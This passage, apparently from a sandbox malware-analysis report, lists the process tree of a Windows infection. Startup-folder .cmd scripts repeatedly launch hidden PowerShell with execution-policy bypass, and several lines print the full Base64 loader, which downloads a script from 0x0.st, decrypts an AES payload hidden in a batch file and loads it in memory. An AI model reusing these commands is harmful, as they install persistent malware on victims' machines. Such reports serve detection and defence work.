      • powershell.exe (PID: 6580 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5488 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3328 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5732 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2452 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5288 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2156 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6556 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5668 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5660 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2528 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 364 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5464 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5472 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6944 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5676 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
